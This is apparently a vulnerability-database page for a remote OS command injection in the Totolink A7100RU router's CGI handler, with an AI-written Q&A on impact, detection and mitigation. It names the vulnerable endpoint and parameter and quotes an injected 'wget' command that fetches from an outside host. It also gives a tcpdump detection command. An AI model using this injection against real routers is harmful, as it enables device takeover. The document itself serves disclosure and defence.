CVE-2026-6029
Received Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler (Remote

Publication date: 2026-04-10

Last updated on: 2026-04-10

Assigner: VulDB

Description
A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument User results in os command injection. The attack may be launched remotely. The exploit is now public and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-10
Last Modified
2026-04-10
Generated
2026-05-06
AI Q&A
2026-04-10
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a7100ru 7.4cu.2313_b20191024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-6029 is a command injection vulnerability in the TOTOLINK A7100RU router, specifically in version 7.4cu.2313_b20191024. The flaw exists in the CGI script cstecgi.cgi within the function that processes a user-supplied parameter named "user." This parameter is formatted and then executed as an operating system command without proper sanitization, allowing an attacker to run arbitrary commands on the router remotely.

An attacker can exploit this by sending a crafted HTTP POST request containing a malicious "user" parameter to the router's /cgi-bin/cstecgi.cgi endpoint. For example, the attacker can inject commands like `wget 192.168.6.1:7777/testpoc` which the router will execute, demonstrating remote command execution capability.


How can this vulnerability impact me? :

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication. This can lead to full compromise of the device, including unauthorized access, control over network traffic, installation of malware, or use of the router as a pivot point for further attacks within the network.

Because the exploit is publicly available, attackers can easily leverage this flaw to disrupt network operations, steal sensitive information, or launch attacks against other systems connected to the compromised router.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for suspicious HTTP POST requests sent to the endpoint /cgi-bin/cstecgi.cgi, especially those containing a JSON payload with a "user" parameter that includes command injection patterns.

A practical detection method is to capture and analyze network traffic for POST requests targeting /cgi-bin/cstecgi.cgi with unusual or suspicious "user" parameter values that attempt to execute commands such as wget or other shell commands.

For example, you can use the following command to monitor HTTP POST requests on your network (replace interface and filter as needed):

  • tcpdump -i <interface> -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i '/cgi-bin/cstecgi.cgi'

Alternatively, you can use tools like Wireshark or a web application firewall (WAF) to detect POST requests with suspicious payloads containing command injection patterns in the "user" parameter.


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks or IP addresses only.

Disabling or blocking HTTP POST requests to this CGI handler can prevent exploitation.

If possible, update the firmware of the Totolink A7100RU router to a version that patches this vulnerability.

In the absence of an official patch, consider implementing network-level protections such as intrusion detection/prevention systems (IDS/IPS) to block malicious payloads targeting the "user" parameter.

Monitor logs for suspicious activity and commands executed via this vulnerability to detect exploitation attempts early.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability in Totolink A7100RU allows remote OS command injection via the setVpnAccountCfg function, which could lead to unauthorized control over the device.

Such unauthorized access and control can compromise the confidentiality, integrity, and availability of data processed or transmitted by the device.

This may result in non-compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart